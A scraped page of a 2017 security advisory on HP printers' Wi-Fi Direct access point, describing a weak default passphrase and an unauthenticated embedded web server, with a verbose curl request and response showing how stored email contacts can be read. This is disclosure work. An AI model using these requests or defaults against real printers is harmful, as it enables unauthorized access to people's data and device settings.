HP Printers Wi-Fi Direct Improper Access Control
NESESO-2017-0111
NESESO-2017-0111
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
6. Credits<br />
This vulnerability was discovered and researched by a member from Neseso Research Team.<br />
7. Technical Description<br />
<strong>Wi</strong>-<strong>Fi</strong> <strong>Direct</strong> <strong>Improper</strong> <strong>Access</strong> <strong>Control</strong><br />
<strong>Wi</strong>-<strong>Fi</strong> <strong>Direct</strong> [1], initially called <strong>Wi</strong>-<strong>Fi</strong> P2P, is a <strong>Wi</strong>-<strong>Fi</strong> standard enabling devices to easily connect<br />
with each other without requiring a wireless access point. It is useful for everything from internet<br />
browsing to file transfer, and to communicate with one or more devices simultaneously at typical<br />
<strong>Wi</strong>-<strong>Fi</strong> speeds. In a scenario where two devices want to connect they can authenticate using<br />
methods such as PIN, Push-Button or NFC.<br />
<strong>HP</strong> <strong>Printers</strong> implement <strong>Wi</strong>-<strong>Fi</strong> <strong>Direct</strong>[2] support in two ways, one as described on the <strong>Wi</strong>-<strong>Fi</strong> <strong>Direct</strong><br />
specification and the other providing a wi-fi access point that has no security or uses insecure<br />
default credentials (12345678 passphrase is used by default on newer models). Giving access<br />
to anyone that is near enough to establish a <strong>Wi</strong>-<strong>Fi</strong> connection without any user interaction or<br />
notification. The second vulnerability is that the printing services and others, such as the<br />
Embedded Web Server has no authentication by default which gives anyone the ability to not<br />
only access sensitive information but also modify device configuration. These two vulnerabilities<br />
exposes user information and gives unrestricted remote read/write access to the configuration<br />
and services of the printer.<br />
Below two examples of HTTP requests that attackers could use to access emails stored on the<br />
device or disable automatic firmware updates.<br />
$ curl -v --insecure https://192.168.223.1/DevMgmt/Email/Contacts<br />
* Trying 192.168.223.1...<br />
* Connected to 192.168.223.1 (192.168.223.1) port 443 (#0)<br />
* TLS 1.2 connection using TLS_RSA_WITH_AES_256_CBC_SHA256<br />
* Server certificate: <strong>HP</strong>16B465<br />
> GET /DevMgmt/Email/Contacts HTTP/1.1<br />
> Host: 192.168.223.1<br />
> User-Agent: curl/7.43.0<br />
> Accept: */*<br />
><br />
< HTTP/1.1 200 OK<br />
< Server: <strong>HP</strong> HTTP Server; <strong>HP</strong> <strong>HP</strong> OfficeJet Pro 8710 - D9L18A; Serial Number:<br />
XXXXXXXXXX; Built:Wed May 11, 2016 03:44:38PM {WBP2CN1619BR}<br />
< Content-Type: text/xml<br />
< Content-Length: 203<br />
< Cache-<strong>Control</strong>: must-revalidate, max-age=0<br />
< Pragma: no-cache<br />
<<br />
* Connection #0 to host 192.168.1.17 left intact<br />